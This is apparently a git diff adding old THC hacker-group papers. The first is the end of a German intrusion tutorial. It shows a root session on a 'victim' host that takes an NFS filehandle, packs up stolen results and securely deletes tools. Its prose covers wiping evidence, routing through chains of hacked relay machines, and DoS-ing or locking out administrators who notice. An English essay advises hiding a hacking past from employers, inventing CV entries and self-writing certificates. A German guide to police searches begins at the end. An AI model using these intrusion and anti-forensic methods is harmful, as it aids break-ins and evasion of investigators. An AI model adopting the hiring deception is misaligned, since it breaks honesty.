+<p><font color="#FF0000">bash# askhandle nfsserver /nfs_mnt/usr > nfsserver-nfs_mnt.filehandle</font>
+<br><font color="#FF0000">bash# cat nfsserver-nfs*</font>
+<br><font color="#FF0000">nfsserver /nfs_mnt 1e 91 13 52 01 50 00 00 02
+00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</font>
+<p>Jetzt, wo wir root Rechte besitzen koennen wir uns weitere Informationen
+beschaffen, die uns den Weg zurueck ins Netz ermoeglichen koennen. Was
+hier etwas kryptisch aussieht ist nichts weiter als das NFS-Filehandle
+fuer das Verzeichnis <font color="#33FF33">/nfs_mnt</font> des NFS-Servers
+nfsserver. Mit Hilfe dieser Zahlenfolge und eines netten Programms namens
+<b>nfsmenu</b>
+ist es uns nun moeglich das Directory <font color="#33FF33">/nfs_mnt</font>
+von ueberallher zu mounten.
+<p><font color="#FF0000">bash# cd /tmp/".. "</font>
+<br><font color="#FF0000">[1]+&nbsp; Done&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+searcher</font>
+<br><font color="#FF0000">bash# gzip --best s.res</font>
+<br><font color="#FF0000">bash# uuencode s.res.gz s.res.gz</font>
+<br><font color="#FF0000">[...]</font>
+<br><font color="#FF0000">bash# gcc -o rm srm.c</font>
+<br><font color="#FF0000">bash# rm -vss ./*</font>
+<br><font color="#FF0000">Deleting ifconfig *************************************
+Done</font>
+<br><font color="#FF0000">[...]</font>
+<br><font color="#FF0000">bash# cd ..</font>
+<br><font color="#FF0000">bash# rm -r ".. "</font>
+<br><font color="#FF0000">bash# ls -altr ~root</font>
+<br><font color="#FF0000">[...]</font>
+<br><font color="#FF0000">-rw-------&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 90803 Jan 23 11:26 .fvwm2rc</font>
+<br><font color="#FF0000">drwxr-xr-x&nbsp;&nbsp; 3 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 2048 Jan 23 13:57
+bin</font>
+<br><font color="#FF0000">drwxr-xr-x&nbsp; 22 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 Jan 25 11:55
+..</font>
+<br><font color="#FF0000">drwx--x--x&nbsp; 35 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 4096 Jan 26 09:11
+.</font>
+<br><font color="#FF0000">-rw-------&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 150 Jan 26 09:11
+.Xauthority</font>
+<br><font color="#FF0000">-rw-------&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 280 Jan 26 09:12
+.xsession-errors</font>
+<br><font color="#FF0000">drwx------&nbsp;&nbsp; 5 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 Jan 26 09:17
+.netscape</font>
+<br><font color="#FF0000">-rw-------&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 441 Jun 5 13:14
+.bash_history</font>
+<br><font color="#FF0000">-rw-------&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 85 Jan
+5 13:50 .xlockmessage</font>
+<br><font color="#FF0000">bash# exit</font>
+<br><font color="#FF0000">victim% cd</font>
+<br><font color="#FF0000">victim% pwd</font>
+<br><font color="#FF0000">/home/johnny</font>
+<br><font color="#FF0000">victim% ls -altr</font>
+<br><font color="#FF0000">[...]</font>
+<br><font color="#FF0000">-rw-r--r--&nbsp;&nbsp; 1 test&nbsp;&nbsp;&nbsp;&nbsp;
+users&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 3324 Dec 11&nbsp; 1997
+.emacs</font>
+<br><font color="#FF0000">drwx------&nbsp;&nbsp; 2 test&nbsp;&nbsp;&nbsp;&nbsp;
+users&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 May 28 20:57 .grok</font>
+<br><font color="#FF0000">drwxr-xr-x&nbsp;&nbsp; 2 test&nbsp;&nbsp;&nbsp;&nbsp;
+users&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 May 28 20:57 .hotjava</font>
+<br><font color="#FF0000">drwx------&nbsp;&nbsp; 2 test&nbsp;&nbsp;&nbsp;&nbsp;
+users&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 May 28 20:57 .seyon</font>
+<br><font color="#FF0000">drwxr-xr-x&nbsp;&nbsp; 2 test&nbsp;&nbsp;&nbsp;&nbsp;
+users&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 May 28 20:57 .xfm</font>
+<br><font color="#FF0000">drwxr-xr-x&nbsp;&nbsp; 5 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 Jun 6 19:15 ..</font>
+<br><font color="#FF0000">drwxr-xr-x&nbsp;&nbsp; 6 test&nbsp;&nbsp;&nbsp;&nbsp;
+users&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 Jun 6 19:15 .</font>
+<br><font color="#FF0000">victim% exit</font>
+<br><font color="#FF0000">exit</font>
+<br><font color="#FF0000">victim:/home/johhny > exit</font>
+<br><font color="#FF0000">logout</font>
+<br><font color="#FF0000">Connection closed by forign host.</font>
+<br><font color="#FF0000">source ></font>
+<p><font color="#000000">Zum Schluss wipen wir unsere Tools von der HD,
+damit sie nicht durch einfaches Raw-Reading oder&nbsp; <i>Magnetic Force
+Microscopy</i> (<i>MFM</i>) o. ae. wieder hergestellt werden koennen, und
+vergewissern uns, dass wir in den Home-Direc., in denen wir rumgewurschtelt
+haben, keine kompromitierenden Files hinterlassen.</font>
+<br><font color="#000000">Mit Sicherheit koennte noch einiges verbessert
+werden, versuch's und entwickel so deinen eigenen Style.</font>
+<p>Lege dir ein Art Datenbank mit allen noetigen Information ueber deine
+gehackten Rechner an sonst verlierst du irgendwann den Ueberblick (natuerlich
+encrypted).
+<br>&nbsp;
+<p><a NAME="a9"></a>
+<h3>
+<font color="#993399">Persoenliche Sicherheit</font></h3>
+Es ist natuerlich klar, dass du deine Daten auf der HD mit&nbsp; CFS&nbsp;
+bzw.&nbsp; SFS&nbsp; und deine E-Mail mit&nbsp; PGP&nbsp; verschluesselts,
+Ramdisks benutzt, Backups deiner wichtigsten Daten auf Tape/CDs nicht zuhause
+lagerst, deinen realen Namen nicht weitergibst usw... dieser Kram soll
+nicht Bestandteil dieses Abschnitts sein, ich moechte lieber ueber eine
+sichere Konfiguration sprechen, die dich beim Hacken schuetzt und vorwarnt
+wenn dich jemand verfolgt.
+<p>Ich werde hier die Methode beschreiben, die ich persoenlich anwende.
+<center><img SRC="test.jpg" height=546 width=800></center>
+Als Einwahltpunkt dient mir eine grosse Uni mit vielen Usern oder ein grosser
+ISP. Ich verwende <i>PPP</i> statt normale Terminalprogramme um eine groessere
+Kontrolle ueber meine Verbindung zu haben und weil es vom Vorteil ist ueber
+eine Leitung mehrere Sessions - Telnet, FTP - laufen zu lassen.
+<br>Ein kleinerer Rechner dient mir als Firewall und Router, ich baue die
+<i>PPP</i>-Verbindung
+zu meinem Einwahlpunkt auf und ueberwache alle eingehenden Pakete. Desweiteren
+stelle ich mit <i>SSH</i> eine Connection zum Einwahlrechner her um periodisch
+alle eingeloggten User und Netzwerkverbindungen zu verfolgen (was natuerlich
+nur funktioniert, wenn der Einwahlrechner eine Unix-Maschine ist und kein
+Terminalserver o.ae.). Es ist sehr interessant zu sehen, was ein Admin
+alles macht, wenn er merkt, dass etwas nicht mit rechten Dingen auf seiner
+Maschine vorgeht. Sobald mir solche Sondierungen/Untersuchungen auffallen
+breche ich die Verbindung sofort ab, falls ich mich aber gerade in einer
+kritischen Lage befinde muss ich DoS-Attacken benutzen oder den Admin aussperren
+um seine Arbeit zu verlangsamen bzw. zu verhindern. Auf dem Einwahlrechner
+ist es nicht noetig seine Gegenwart zu verschleiern, es ist besser unauffaellig
+in der Masse unterzutauchen als irgenwelche Logs zu manipulieren.
+<br>Der zweite, groessere Rechner ist meine Workstation, von hier aus baue
+ich eine <i>SSH</i>-Verbindung zum ersten <i>Anti-Trace Rechner</i> auf.
+Dieser <i>Anti-Trace Rechner </i>wechselt regelmaessig, liegt im Ausland
+und ich hab' volle Kontrolle ueber ihn. Von hier aus gehe ich ueber ein
+weiteren <i>Anti-Trace Rechner </i>zu meinem <i>Hacking-Rechner</i>; auch
+hier habe ich natuerlich &acute;root&acute;-Rechte, der zweite <i>AT-Rechner
+</i>ist
+nur ein einfacher <i>TCP-Relay</i>, damit erspare ich mir den Stress mit
+den Logfiles etc. Vom <i>Hacking-Rechner </i>gehe ich in sehr sichere Domains
+oder hacke von hier aus neue Netzwerke (es existieren selbstverstaendlich
+mehrere dieser Rechner, die zudem unregelmaessig gewechselt werden). Zum
+Scannen benutze ich einen eigens dafuer gehackten Rechner, die Scanner
+sind hier alle gut versteckt und zusaetzlich mit <i>3DES</i> verschluesselt.
+<p>Die verschluesselten <i>SSH </i>Verbindung sind noetig, damit die Admins/Bullen/Geheimdienste
+nicht meine Aktivitaeten am Einwahlpunkt (oder sonstwo) mitschneiden koennen.
+<p>Falls du nur einen Rechner zur Verfuehgung hast, dann kannst du dich
+natuerlich auch mit der Firewall von Linux/FreeBSD/OpenBSD auf deiner Workstation
+schuetzen. Es ist jedoch kompfortabler die Verbindung ueber einen speziellen
+Computer zu beobachten (ich weiss nicht inwiefern Linux und Co. einen zweiten
+Monitor an einem Rechner unterschtuetzt).
+<p>Zusaetzlich solltest du noch deinen Kernel patchen, damit er dir mehr
+informationen ueber eingehende Pakete liefert, somit bist du in der Lage
+die Herkunft (leider nicht immer;) von DoS Attacken, Source-Routing Angriffe,
+Traceroutes etc. zu erkennen.
+<br>&nbsp;
+<p><a NAME="a10"></a>
+<h3>
+<font color="#993399">Letzte Worte</font></h3>
+<font color="#000000">Ich hoffe, der Text konnte dir einen guten Ueberblick
+zum Thema Internet-Hacking geben.</font>
+<br><font color="#000000">Vielleicht ist dir aufgefallen, dass ich nicht
+die Verwendung von irgnedwelchen Exploits und Hacking-Tools beschrieben
+habe, das hat einen einfachen Grund, undzwar moechte ich keine Skript Kiddies
+heranzuechten, sondern nur einen leichten Einstieg fuer die wirklich interessierten
+Leute unter euch bieten - warum das Rad staendig neu erfinden!?</font>
+<br><font color="#000000">Und vergiss nicht: Hacken ist nicht der Nexus...
+denk' auch mal an's nicht digitale Leben - Frauen, Parties, ...</font>
+<br>&nbsp;
+<br>&nbsp;
+<h3>
+<a NAME="a10"></a></h3>
+
+<h3>
+<font color="#993399">Wichtige Links</font></h3>
+&nbsp;<a href="http://www.false.com/security">http://www.false.com/security</a>
+<br>&nbsp;<a href="http://www.insecurity.org/nmap">http://www.insecurity.org/nmap</a>
+<br>&nbsp;<b><a href="http://www.thc.org">http://www.thc.org</a></b>
+[die THC Hauptseite - unbedingt besuchen! ;-) Hier gibts auch die Updates
+fuer diesen Artikel]
+<br>&nbsp;<a href="http://www.secunet.com">http://www.secunet.com</a>
+<br>&nbsp;<a href="http://geek-girl.com/bugtraq">http://geek-girl.com/bugtraq</a>
+<br>&nbsp;<a href="http://rootshell.com">http://rootshell.com</a>
+<br>&nbsp;<a href="http://rootshell.com/doc">http://rootshell.com/doc</a>
+<br>&nbsp;<a href="http://www.sparc.com/charles/security.html">http://www.sparc.com/charles/security.html</a>
+<br>&nbsp;<a href="http://command.com.inter.net/~sod/">http://command.com.inter.net/~sod/</a>
+<br>&nbsp;<a href="http://www.phrack.com">http://www.phrack.com</a>
+<br>&nbsp;<a href="http://www.cs.purdue.edu/coast/">http://www.cs.purdue.edu/coast/</a>
+<br>&nbsp;<a href="http://www.pilot.net/security-guide.html">http://www.pilot.net/security-guide.html</a>
+<br>&nbsp;<a href="http://underground.org/">http://underground.org/</a>
+<br>&nbsp;<a href="http://www.l0pht.com">http://www.l0pht.com</a>
+<br>&nbsp;<a href="http://www.infonexus.com">http://www.infonexus.com/~deamon9</a>
+<br>&nbsp;<a href="http://www.cert.org">http://www.cert.org</a>
+<br>&nbsp;<a href="http://www.cert.dfn.de">http://www.cert.dfn.de</a>
+<br><a href="ftp://ftp.blip.pp.se/pub/cracking">&nbsp;ftp.blib.pp.se/pub/cracking</a>&nbsp;
+alot of tools and exploits!!!!
+<p>
+<hr WIDTH="100%">
+<br>&nbsp;
+<center>
+<h3>
+<b><blink><font size=+2>This is the End my Friend</font></blink></b></h3></center>
+
+<center>
+<p><br><b>All my Love to:</b>
+<br><font color="#3333FF"><font size=+1>My lovely Girl - You are my Sun!</font></font>
+<br>my best Friend #1
+<br>my best Friend #2
+<br>Sir Fredde Richard - "Two Bud and a chessgame, please."
+<p><b>Greets to:</b>
+<br>van Hauser
+<br>Fr00dy
+<br>Salpeter
+<br>The Lord o/t Hardschool - I hope you are not in trouble.
+<br>stanly
+<br>Zonk
+<br>THC/ADM/dEEP
+<br>JEVER, Budweiser-, Paulaner- and Sol-Brewery - Stop selling your beer!
+I&acute;m addicted! ;)
+<p><b>Hate goes to:</b>
+<br>all politicans
+<br>all religions of this fucking world
+<br>all clocks - I'm the real TICK!</center>
+
+<p><br>
+<center>
+<h1>
+<font color="#33FF33"><font size=+4>TICK / THC</font></font></h1></center>
+
+</body>
+</html>

Papers/hackers_go_corporate.txt

@@ -0,0 +1,362 @@
+
+|----------------------------- HACKERS GO CORPORATE  -------------------------|
+|-----------------------------------------------------------------------------|
+|------------------ van Hauser / THC <vh@reptile.rug.ac.be> ------------------|
+
+
+----|  Preface
+
+The following article has been discussed controversially in the rows of the
+THC members. Some of Van Hauser's statements reflect his personal opinion
+and are inconsistent with other THC members opinions. As the webmaster of
+the THC site, I would like to give *YOU* the chance to judge. 
+
+                                                              - Plasmoid
+
+
+
+----|  Introduction
+
+Young hackers usually dream about becoming a well-known security expert,
+whose job is about executing high profile penetration tests on fortune
+100 companies. Why? Cool and interesting projects, bleeding edge hard and
+software to work with, new areas to learn and gain knowledge, earning money,
+creating (another) high profile - this time with the real name -
+most hackers dream of that - few actually achieve that.
+
+This article is meant to change this.
+
+It is mostly about the pitfalls a hacker has to overcome, especially when
+a company doesn't like "evil" hackers for the job. Therefore a sound and
+seemingly logical explanation, where he did get this security knowledge is
+very important. Some people might say "hey, nice article, but it is not
+really about hacking" - well, I say it is. It is about hacking coporate
+minds. You want to achieve your goal - working for that fortune 10 bank as
+an IT security expert, but f*ck, they don't like hackers. Hackers are evil,
+criminals, they say. So you have to hack their brains to get what you want!
+
+First, it should be clear what a "security job" is about - or being
+a whitehead. The world, work and views are different. The section
+"Hacker World vs. Security World" is describing this.
+
+Then you might need additional knowledge to impress your hope-fully new
+employer - also the ways for that are pretty clear, you can find some hints
+at "Getting a Background".
+
+After you know what will await you, you actually have to apply for a job.
+There are some do's and some don'ts you should keep in mind for writing
+your application documents and when you've got your job interview. The
+sections "Truthful or not", "How to find a job", "Getting your CV right"
+and "The Job Interview" will keep you on the right track.
+
+And finally: "Things you should not do after getting the job". This might
+be more important than you think.
+
+Last thing you should keep in mind when reading this text: it is
+especially meant for people who have a hard time to get employed because
+the company they are interested in have got a "no-hacker" policy, or the
+country they are living in are seeing hackers not as an enrichment to the
+security business. If you are trying to get into a company which welcomes
+hackers with open arms - which is rarely the case - this text can still be
+important to you.
+
+About me: as a former hacker and phreaker, I'm working for 7 years in the
+security field now and had to struggle several times with this topic. I
+also helped several friends and peers to their security jobs so far. The
+contents here is my own vast ;-) experience - with input from friends and
+colleagues.
+
+Enjoy.
+
+
+
+----|  Hacker World vs. Security World
+
+What is the hacker's view of the world? Wardialing modems, attacking web
+servers, writing exploits, driving around in the city to find vulnerable
+wavelan networks, exploring bleeding edge hardware, programming a new tool
+for weeks until it is perfect, meeting with hacker friends for weekend
+sessions and drinking jolt - well and having a good time.
+Is a security job like that? Well, of course not - but what is it actually
+about?
+In the security field, there are different positions.
+ a) The Programmer - he deals with programming operating systems or
+    applications. The job might be just that of a programmer (e.g.
+    programmer for the Sun Solaris kernel), or a development of security
+    components (e.g. part of the development team of Checkpoint's
+    Firewall-1), or part of the security audit team of a software package
+    (e.g. AIX security team from IBM in Austin/Texas).
+ b) The Administrator - he is responsible for running special equipment or
+    whole infrastructures. An administrator can be responsible for
+    all servers of a special operating system (e.g. Windows admin), the
+    network (LAN/WAN admin), applications (SAP, Oracle, Lotus Notes, etc.),
+    firewalls, etc.
+    The smaller the company, the broader and more general is usually the
+    scope of work for an administrator.
+ c) The Operator - sitting in front of a monitor (or several) all days and
+    evaluating output of logs and system messages. Boring. But usually you
+    get a good overall salary through additional holiday, weekend bonus
+    etc. Hackers rarely do that - but it's an option.
+ d) The Security Officer - he is writing the security policies and
+    procedures for the company. If a security incident is happening, he
+    has to decide what to do. Usually, he is also part for defining
+    security and access roles for important. A very important job, but
+    that of a paper tiger - and attending many boring meetings and
+    eventually reviewing some audit files.
+ e) The IT Auditor - an independent organ within the organization which
+    ensures the adequateness of IT controls. A job where you not make many
+    friends, but usually can travel around the world, if you are working
+    for a big company. Most audit work is about organisational procedures
+    and if they are followed, interviews and reviewing logs. However in
+    some positions, you can also things like penetration tests - but also
+    if that's the case, it's just a small part of the job description.
+    An IT auditor usually can not build up deep knowledge, however get a
+    very broad knowledge and a very good overview of the company.
+ f) The Consultant - he works for a consultant company (whew!). From a
+    hacker's point of view, there are 3 types: general consultant
+    companies (e.g. McKinsey, KPMG, Ernst & Young), IT consultant
+    companies (e.g. IBM Consulting, Accenture) or IT security companies
+    (e.g. @stake, secunet, etc.). What is the difference? Well,
+    specialization of the company and size of the company.
+    It should be noted that most big audit companies (e.g. PWC, KPMG,
+    etc.) also have got IT security auditors, which do a mix of e) and f).
+ g) The "Hacker" - employed by the company to check the security of
+    networks, review source code, etc. In some companies, they are hired to
+    show to customers or press they employ cool people (hi to Ken William
+    ;-) This job type is actually very rare ...
+
+In some companies - especially security consultant companies who also
+develop software, some people can actually be programmer and consultant.
+This is the case for @stake, Razor, eEye, etc. - but of course also there
+just for some special guys.
+
+So that you have got a picture now what type of work there is to do, how
+is the work done? What is the view on the work?
+
+1) A hacker's "job" is actually very easy - viewed from a whiteheads side.
+   "They try to break into some company, and if they find a hole - great, if
+   not - well they try another company. They only have to find one hole,
+   that's enough." Also this is exaggerated, there is much truth in it, if
+   you see it as a game between "black" and "white".
+   A "whitehead" has to find all holes, and close them. That's a completely
+   different view - and many will say more challenging as well.
+2) When you changed the side - you also have to change your work habits.
+   You will normally get a description what is your scope of work - and
+   that's what your job is about. You can't to just what you think would
+   be fun to do. Doing a fast penetration test on your companies mail
+   server? Might bring you to jail if you were not authorized. 
+   Every job brings limits with them - and if you want to keep yours, you
+   have to follow them.
+3) Then you have to follow procedures (e.g. the company's security
+   policies, working hours, dress code). In some companies these are very
+   strict, in others it's very relaxed.
+4) You can not just work how you want to. If you are a database
+   administrator or you got a job in a security consultant company to do
+   penetration tests: you must either follow a methodology how you have to
+   do your work - to ensure the quality, or you have got to document
+   everything you did - if someone else has to pick-up your work later, he
+   knows what you did and why.
+5) A security job does not mean that you can implement all security you
+   want. Everything will be focused on business needs. Want to install new
+   firewalls, tighten down the filter lists in the firewall, install a new
+   reverse proxy for the eCommerce system? Your boss will ask you why this
+   is needed, what the cost will be, and the impact. The new firewall might
+   add security, but be too expensive. Or the tightened filter lists would
+   make administration, content updates etc. more difficult. Or the reverse
+   proxy might downgrade performance, which would frustrate customers. 
+6) Ever heard about the famous "soft skills"? Yeah, you might be
+   technically an expert, but within a company, you are not alone, and you
+   don't act and work alone. This is why good communication skills (being
+   friendly, helpful, open, respectful, truthfully etc. blabla) are very
+   important. In fact you should even consider this for your private life
+   anyway - it enhances your friendship with hackers (and girls as well!
+   ;-) ...
+
+So why going corporate anyway? It doesn't sound like fun. Well - it can be
+fun. It depends on the company's culture and how much freedom you get.
+And the work can be very rewarding from what you can learn, expand your
+knowledge, environments and companies you see and working professionally
+the first time in your life.
+
+So brighten up - it can be fun and rewarding. Just remember: corporate
+life is not a piece of cake and to take too easy. You'll have to adapt.
+
+
+
+----|  Getting a Background
+
+Now that you know what a corporate life is about, you can qualify yourself
+better if you've got security background - not hacker background - already.
+Helpful are e.g. Cisco configuration know-how, solaris/aix/win2k
+administrator know-how, knowledge about security policies, hands-on
+experience about firewall setups and server hardening, programming skills,
+etc.
+What skills are especially helpful for the job you would like to do?
+Take a look at the job descriptions from the previous paragraph and then
+imagine what kind of knowledge is needed.
+Then try to acquire somehow the knowledge. E.g. buy books, read online
+articles about the topics, buy some old and cheap cisco/sun/rs6000/etc.
+hardware and get some experience.
+www.securityfocus.com is a good starting point for finding related
+articles and books, ebay.com is a good place to find hardware, etc.
+
+However the best is to get an internship or part-time job at an ISP or
+security division of a big company.
+
+
+
+----|  Truthful or not?
+
+There are companies out there which have got a "no hacker" policy.
+There are countries where it is common thinking that hackers do "hacking"
+and therefore not adequate for "security" jobs - for ethical,
+philosophical or technical reasons.
+If you think that a company has got a "no hacker" policy - don't tell them.
+If you don't know if they have got such a policy - don't tell them either.
+You can still do that later if you get the strong feeling in the interview
+they think positively about hackers. Otherwise: don't.
+
+
+
+----|  How to find a job
+
+For some people it's easy: the job offers are made to them. For this you've
+got to become famous or well-known in the security/hacker community. Good
+examples for this are the l0pht team or ADM, or single individuals like
+rain forrest puppy and Fyodor.
+If the job doesn't come to you, you have to look for a job yourself. There
+are three ways:
+1) Go to security conferences (or hacker conferences) - Usenix
+   Security Symposium and Blackhat Briefings are usually very good for
+   this, hold a good presentation, talk to some people ... and there you
+   are.
+2) You search for security jobs on Internet job search engines (keywords
+   like "firewall", "security" even maybe "hacker" will bring you further),
+   additionally www.securityfocus.com has got the SecurityJobs mailing
+   list (and archive).
+3) You directly send your resume to the companies you want to work for.
+   This is actually very effective. Job ads on the Internet, computer
+   magazines or newspapers are expensive and usually don't bring much
+   results for the companies as the market for security specialists is
+   empty most of the time. So if you just send the IT security departments
+   your resume - you will get at least a job interview 90% of the time.
+
+Or if you know someone within a company, he might propose you as a new
+team member :-) that would be the easiest way ...
+
+
+
+----|  Getting your CV right
+
+CV stands for Curriculum Vitae and means resume or application documents.
+Before you start writing yours, get on the internet and read tips about
+writing one.
+Specifically for hackers going corporate, you should take of the following:
+1) Your CV should contain no holes. If you spent 3 month burping and
+   farting in your room, put in your CV:
+      "January 2000 - March 2000: private software development project on
+       secure web applications. I experimented with various blabla, and
+       developed blablabla which enhanced security blabla ..."
+   I guess you get the picture.
+2) Whatever you did - high school, internship, university, part-time jobs -
+   mention everything from a light what you did there in the security
+   field - and a bit more ... e.g. if you administrated a webserver for an
+   ISP as an part-time job, you write:
+      "I was responsible for the security of the webserver, had to review
+       the system and apache log files, review the source code of the CGIs,
+       blablabla"
+3) If you did internships, part-time jobs or security related courses at
+   high school or university (even about cryptography and system
+   management) try to get a internship certification, signed resume,
+   whatever. Try to influence the contents so it focuses on security.
+   In many companies you usually write them yourself and let them sign by
+   the boss - this is the easiest way of course.
+
+
+
+----|  The Job Interview
+
+Show that you are ethical - give them the feeling that you would never
+ever hack the company - without proper authorization by management. If
+they think you are a shady character, no way they will hire you. Even if
+they think positively about hackers.
+
+Don't tell them you are a hacker, unless you really get the feeling during
+the interview that this would help you!
+
+If the company has got a "no hacker" policy, you'll have to face questions
+like "Are you a hacker", "have you been a hacker before", "could you get
+into the system you once administrated?", etc.  Sometimes even challenging
+you like "Are you skilled enough to still get into the firewall at the
+university you built up?".
+If you don't want to lie (like me), you can answer them like: "What do you
+mean by 'if I am a hacker', if you mean 'someone who is vandalizing web
+pages' - no, never, if you mean 'someone curious about security and
+paranoid enough to tighten down everything and programming until 4 o'clock
+in the morning' - yes, then I'm a hacker".
+
+If you don't want to appear like a hacker - don't dress like one. Dress
+Like the company expects the proper person to be. This might be a business
+suit or casual. If in doubt: business suit, especially if it's a
+consultant/auditor job.
+
+And of course the usual tips for job interviews apply here as well. Buy a
+book about that or read them on the internet.
+
+
+
+----|  Things you should not do after getting the job
+
+Remember the following things:
+
+Do NOT hack the company you are working for! If you are working for an
+external audit or consultancy company, this includes your customers!
+Do NOT hack other companies from the company you are working for or it's
+customers!
+NEVER tell anyone from the hacker scene about the security (or insecurity)
+of your company (and customers)!
+NEVER tell your company (or your customers) secrets from the hacker scene -
+otherwise you'll not have got much friends anymore ...
+It might not be wise to tell people in the company, that you are (or have
+been) a hacker. People usually can't keep their mouths shut.
+It is wise not to do any illegal things after becoming corporate - if you
+are caught hacking into some systems - do you think your company will
+believe that you never hacked them .... ?! So better become a greyhat, and
+have fun researching and still do the same stuff like before. But either
+authorized or passive watching ...
+
+
+
+----|  Closing Remarks
+
+Several companies which fear hackers will think after reading this -
+"f*ck, we have to tighten the "new employee" process".
+But I will tell you something: Too late ... we are already everywhere.
+In all major consultant, audit and software development, banks and IT
+security companies are former hackers. And guess what?
+The world is not crumbling down in despair. Most hackers have ethics.
+You might not like their ethical code, but most of them have a code of
+honour, and would never hack the company they are working for.
+You might say - "but the others, not all are good" - yes, that's true,
+but so is the rest of the world - same is true about people who are not
+hackers. If you fight us you will loose - valuable team-members, with
+strong skills and experiences. Think about it.
+
+And to the hacker scene: having a cool security job and still doing
+greyhat stuff - this is the best thing which can happen to us. Having fun -
+and getting paid for it. r0qz!
+
+
+
+----|  Greets
+
+Greets to Doc Holiday, Mindmaniac, Tick, Stealth, Vax, SevenUp,
+Escher and Rookie who all went corporate successfully - and these are
+just some of the German guys. Ken Williams, Fyodor, L0pht, some of ADM
+and many, many, many more as well. Have fun and kick ass!
+
+Greets to my group THC (visit our 31337 HACKER QUIZ at
+http://www.thc.org/quiz), TESO, ADM, LAM3RZ and L0pht.
+
+2001, van Hauser / THC <vh@reptile.rug.ac.be>
+

Papers/hausdurc.txt

@@ -0,0 +1,547 @@
+
+
+                   D i e   H a u s d u r c h s u c h u n g
+                                   -oder-
+             Was tue ich, wenn der Vater Staat mich besuchen will
+
+
+                                    ***
+
+
+          
+                            by Mindmaniac / 1997
+                        written for THC Magazine #4
+
+        \\\ Was lange waehrt wird endlich gut. Die Rache ist suess. ///
+
+               
+                                    ***
+
+
+ Eine praktische und theoretische Kurzanleitung fuer den smarten und 
+ aufgeklaerten User ueber die Vorbereitung und erfolgreiches Durchstehen
+ von Hausdurchsuchungen - bestehend aus:
+
+               Teil I   - Theorie und Praxis der Hausdurchsuchung
+               Teil II  - Praeventivmassnahmen
+               Teil III - Kurze Zusammenfassung fuer Notfaelle
+               Teil IV  - Literaturliste
+
+
+
+Anmerkung:
+Da ich selbst kein Jurist bin, wird dieser Artikel nach dem Fertigstellen auf 
+seine juristische Richtigkeit von einem "echten" Juristen ueberprueft -
+trotzdem kann fuer die gemachten Angaben keine Garantie uebernommen werden.
+Alle Angaben nach bestem Wissen und Gewissen und im Einklang mit dem geltenden 
+Recht. Juristischer Geltungsbereich: BRD / 1997
+
+
+!!!   IM NOTFALL LIES DIE KURZE ZUSAMMENFASSUNG AM ENDE DIESES ARTIKELS   !!!
+
+
+
+
+         ***  Teil I - Theorie und Praxis der Hausdurchsuchung  ***
+
+
+     In Zeiten wachsender Staatswillkuer, arroganten und skrupellosen
+Umgangs der Staatsorgane und seiner willigen Vollstrecker mit ihren Buergern, 
+habe ich mich entschlossen diesen Guide zu schreiben. Wie das Schicksal so 
+will, habe ich mich aus aktuellem Anlass mit der Materie beschaeftigt, da 
+einige meiner engsten Kumpane einer ueberraschenden Hausdurchsuchung ins Auge
+schauen mussten. Leider ist selten etwas unvorbereitetes auch erfolgreich,
+deswegen ging so manche Durchsuchung fuer den Delinquenten unvorteilhafter 
+aus, als es haette sein muessen. 
+
+Werter Leser, beachte bitte auch, dass dieser Text nicht geschrieben wurde 
+um das Begehen von Straftaten zu foerdern. Du weisst was du tust. Dieser Text
+soll dir einfach helfen, dich vor Uebergriffen des Staates auf deine unver-
+aeusserlichen Menschenrechte, zu schuetzen und zu wehren.  Lasst uns also 
+keine Zeit verlieren...
+
+
+Zuerst ein wenig Theorie:
+
+Wir leben in einem s.g. Rechtsstaat, das heisst erstens, dass wir in einem
+Staat leben. Leben in einem Staat bedeutet dass jeder seiner Buerger ein 
+wenig Freiheit in Sicherheit eintauscht. Die Freiheit des Buergers wird 
+durch Gesetze begrenzt, andererseits bekommt jeder auch ein grosses Stueck 
+an Sicherheit - sein Leben und Besitztum wird durch den Staat garantiert, 
+so dass er, in der Regel, ein sicheres Leben fuehren kann, ohne um sein Leben 
+und seine Habe zu fuerchten. Zweitens bedeutet Rechtsstaat, dass das 
